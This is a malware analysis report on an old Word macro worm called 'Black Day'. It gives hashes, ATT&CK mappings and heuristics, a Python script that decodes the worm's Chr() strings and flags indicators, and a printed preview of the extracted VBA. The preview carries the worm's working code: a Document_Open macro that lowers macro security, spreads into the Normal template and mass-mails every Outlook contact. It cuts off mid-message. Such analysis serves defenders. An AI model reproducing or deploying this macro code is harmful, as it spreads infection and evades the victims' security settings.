Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 19b3858dd7b503c1…

MALICIOUS

Office (OLE)

Size: 37.0 KB  Created: 2000-07-14 12:20:00  Authoring application: Microsoft Word 8.0  First seen: 2012-06-14
MD5: e020759b2f7b117de9648dbf0e2255fc SHA-1: 45fdaf3bf51b8af505cb6329c22eff4bf0305dd6 SHA-256: 19b3858dd7b503c1901f71390e12bc2b4c93f40b284b3b0b84c6eecd0070af14
Risk Score: 328

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word 97-format document whose VBA project carries a Document_Open macro, so the code runs as soon as the file is opened with macros enabled. What it does is the behaviour of a classic Word macro worm, not a downloader or a lure. First it builds its strings from runs of Chr() calls; decoded, these are the document properties it writes (Author "-=DaGoN=-", Title "BlAcK DaY ViRuS", Subject "This is a Black Day!", Comments "Thx to Codebreakers.", Keywords " | Black Day | DaGoN | ItAlY | "). It then lowers Word 2000 macro security to Level 1 through the HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security key, greys out the Tools > Macro and Security... menu entries, switches off Options.VirusProtection, suppresses auto-macro warnings and alerts, and disables the cancel key so the user cannot interrupt it. Next it copies its own module between the document and the Normal template through the VBProject object model, using c:\windows\Kernel32.sys as a scratch file and renaming the copy in Normal to Document_Close, so every document created afterwards inherits the code. It saves a copy of itself as %WINDIR%\free.doc, then instantiates Outlook.Application, walks every MAPI address list and sends a message with the subject "Internet Now FREE, it's the future!!!" to each entry. The security-setting changes are persistence and defence evasion for the copied macro, not a decoy. The ClamAV signatures Win.Trojan.Psycho-3 (on the file) and Win.Trojan.wmvg-1 (on the extracted macro source) corroborate the verdict.

Heuristics 7

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
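The string decoding and indicator matching that the heuristics above describe can be reproduced on the extracted source. The script below is an added example written for this page; it is not the analyzer's own code, and its rule names are mine, not the OLE_VBA_* ids above. Its input is a constructed excerpt of the macro preview further down the page, embedded so the script runs offline. It collapses Chr() runs into string literals first, so the indicator rules see what the macro actually builds, then reports the auto-exec entry point, the decoded strings, and the line hits for security tampering, VBProject access, CreateObject, Outlook MAPI and Environ().

```python
import re
from collections import defaultdict

# Constructed sample: lines taken from the macro preview on this page, trimmed to
# the ones that carry indicators, so the script runs offline against known input.
SAMPLE_VBA = r'''Sub Document_Open()
On Error Resume Next
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(45) + Chr(61) + Chr(68) + Chr(97) + Chr(71) + Chr(111) + Chr(78) + Chr(61) + Chr(45)
.Title = Chr(66) + Chr(108) + Chr(65) + Chr(99) + Chr(75) + Chr(32) + Chr(68) + Chr(97) + Chr(89) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
.Execute
End With
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1)
WordBasic.DisableAutoMacros 0
UN92 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
ActiveDocument.SaveAs Environ("WINDIR") & "\free.doc"
Set Black_OApp = CreateObject("Outlook.Application")
Set Black_Mapi = Black_OApp.GetNameSpace("MAPI")
End Sub
'''

# A run of two or more Chr(n) calls joined by + or &: the string-building shape
# this sample uses.  A lone Chr() call is left alone.
CHR_ONE = re.compile(r'Chr\$?\(\s*(\d+)\s*\)', re.I)
CHR_RUN = re.compile(r'Chr\$?\(\s*\d+\s*\)(?:\s*[+&]\s*Chr\$?\(\s*\d+\s*\))+', re.I)
STRING_LITERAL = re.compile(r'"((?:[^"]|"")*)"')

# Macro names Word/Excel run without being called.
AUTO_EXEC_NAMES = ('AutoOpen', 'AutoExec', 'AutoNew', 'AutoClose', 'AutoExit',
                   'Document_Open', 'Document_Close', 'Document_New',
                   'Workbook_Open', 'Auto_Open')
AUTO_EXEC = re.compile(r'^\s*(?:Public\s+|Private\s+)?Sub\s+('
                       + '|'.join(AUTO_EXEC_NAMES) + r')\b', re.I)

# Indicator rules (my own names, not the analyzer's rule ids).  Each is applied
# to the line *after* Chr() decoding so strings hidden that way are visible.
INDICATORS = {
    'MACRO_SECURITY_TAMPER': re.compile(
        r'\\Word\\Security|Options\.VirusProtection|DisableAutoMacros', re.I),
    'VBPROJECT_ACCESS': re.compile(r'\.VBProject\b', re.I),
    'CREATEOBJECT':     re.compile(r'\bCreateObject\s*\(', re.I),
    'OUTLOOK_MAPI':     re.compile(r'GetNameSpace\s*\(\s*"MAPI"', re.I),
    'ENVIRON':          re.compile(r'\bEnviron\s*\(', re.I),
}


def decode_chr_strings(line: str) -> str:
    """Collapse each Chr(n) + Chr(n) ... run into a quoted VBA string literal."""
    def _join(m):
        text = ''.join(chr(int(n)) for n in CHR_ONE.findall(m.group(0)))
        return '"' + text.replace('"', '""') + '"'
    return CHR_RUN.sub(_join, line)


def triage(vba_source: str) -> dict:
    """Decode Chr() runs, then collect auto-exec entry points, the strings that
    were hidden behind Chr(), and (line number, line) hits per indicator."""
    result = {'auto_exec': [], 'decoded_strings': [], 'indicators': defaultdict(list)}
    for no, raw in enumerate(vba_source.splitlines(), 1):
        line = decode_chr_strings(raw)
        if line != raw:  # only record strings the decoder actually produced
            result['decoded_strings'].extend(
                s.replace('""', '"') for s in STRING_LITERAL.findall(line))
        m = AUTO_EXEC.match(line)
        if m:
            result['auto_exec'].append(m.group(1))
        for name, rx in INDICATORS.items():
            if rx.search(line):
                result['indicators'][name].append((no, line.strip()))
    result['indicators'] = dict(result['indicators'])
    return result


if __name__ == '__main__':
    report = triage(SAMPLE_VBA)
    print('auto-exec entry points:', report['auto_exec'])
    print('decoded strings:       ', report['decoded_strings'])
    for rule, hits in report['indicators'].items():
        for no, text in hits:
            print(f'{rule:<22} line {no}: {text}')
```

Run it directly and it prints the decoded Author and Title values followed by each indicator hit with its line number. Decoding before matching is the point: a rule keyed on a literal such as "Outlook.Application" would miss a macro that assembles that string from Chr() calls, which is why the loader heuristic above keys on the decoder shape feeding a sink rather than on the literal.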

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24936 bytes
SHA-256: bc8fa991e879976d6da61bf2ac545d38bba04746170732a6520c26df8dba2969
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
On Error Resume Next
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(45) + Chr(61) + Chr(68) + Chr(97) + Chr(71) + Chr(111) + Chr(78) + Chr(61) + Chr(45)
.Title = Chr(66) + Chr(108) + Chr(65) + Chr(99) + Chr(75) + Chr(32) + Chr(68) + Chr(97) + Chr(89) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
.Subject = Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(105) + Chr(115) + Chr(32) + Chr(97) + Chr(32) + Chr(66) + Chr(108) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(68) + Chr(97) + Chr(121) + Chr(33)
.Comments = Chr(84) + Chr(104) + Chr(120) + Chr(32) + Chr(116) + Chr(111) + Chr(32) + Chr(67) + Chr(111) + Chr(100) + Chr(101) + Chr(98) + Chr(114) + Chr(101) + Chr(97) + Chr(107) + Chr(101) + Chr(114) + Chr(115) + Chr(46)
.Keywords = Chr(32) + Chr(124) + Chr(32) + Chr(66) + Chr(108) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(68) + Chr(97) + Chr(121) + Chr(32) + Chr(124) + Chr(32) + Chr(68) + Chr(97) + Chr(71) + Chr(111) + Chr(78) + Chr(32) + Chr(124) + Chr(32) + Chr(73) + Chr(116) + Chr(65) + Chr(108) + Chr(89) + Chr(32) + Chr(124) + Chr(32)
.Execute
End With
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "" Then
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
CommandBars("tools").Controls("Customize...").Enabled = False
CommandBars("view").Controls("Toolbars").Enabled = False
CommandBars("view").Controls("Status Bar").Enabled = False
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
UN92 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
MM84 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
Application.EnableCancelKey = 0
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set IA14 = ActiveDocument.VBProject.VBComponents.Item(1)
BN71 = True
End If
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set IA14 = NormalTemplate.VBProject.VBComponents.Item(1)
MT5 = True
End If
If MT5 = True Then
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\windows\Kernel32.sys"
IA14.CodeModule.AddFromFile ("c:\windows\Kernel32.sys")
IA14.CodeModule.deletelines 1, 4
IA14.CodeModule.replaceline 1, "Sub Document_Close()"
ElseIf BN71 = True Then
IA14.CodeModule.AddFromFile ("c:\windows\Kernel32.sys")
IA14.CodeModule.deletelines 1, 4
End If
whereits = ActiveDocument.FullName
ActiveDocument.SaveAs Environ("WINDIR") & "\free.doc"
DoEvents
ActiveDocument.SaveAs whereits
DoEvents
Set Black_OApp = CreateObject("Outlook.Application")
Set Black_Mapi = Black_OApp.GetNameSpace("MAPI")
For Each Black_AddList In Black_Mapi.AddressLists
If Black_AddList.AddressEntries.Count <> 0 Then
Black_Count = Black_AddList.AddressEntries.Count
For Black_AddListCount = 1 To Black_Count
Set Black_AddListEntry = Black_AddList.AddressEntries(Black_AddListCount)
Set Black_msg = Black_OApp.CreateItem(0)
Black_msg.To = Black_AddListEntry.Address
Black_msg.Subject = "Internet Now FREE, it's the future!!!"
Black_msg.Body = "No more money to surf, NOW it's Free..." + 
... (truncated)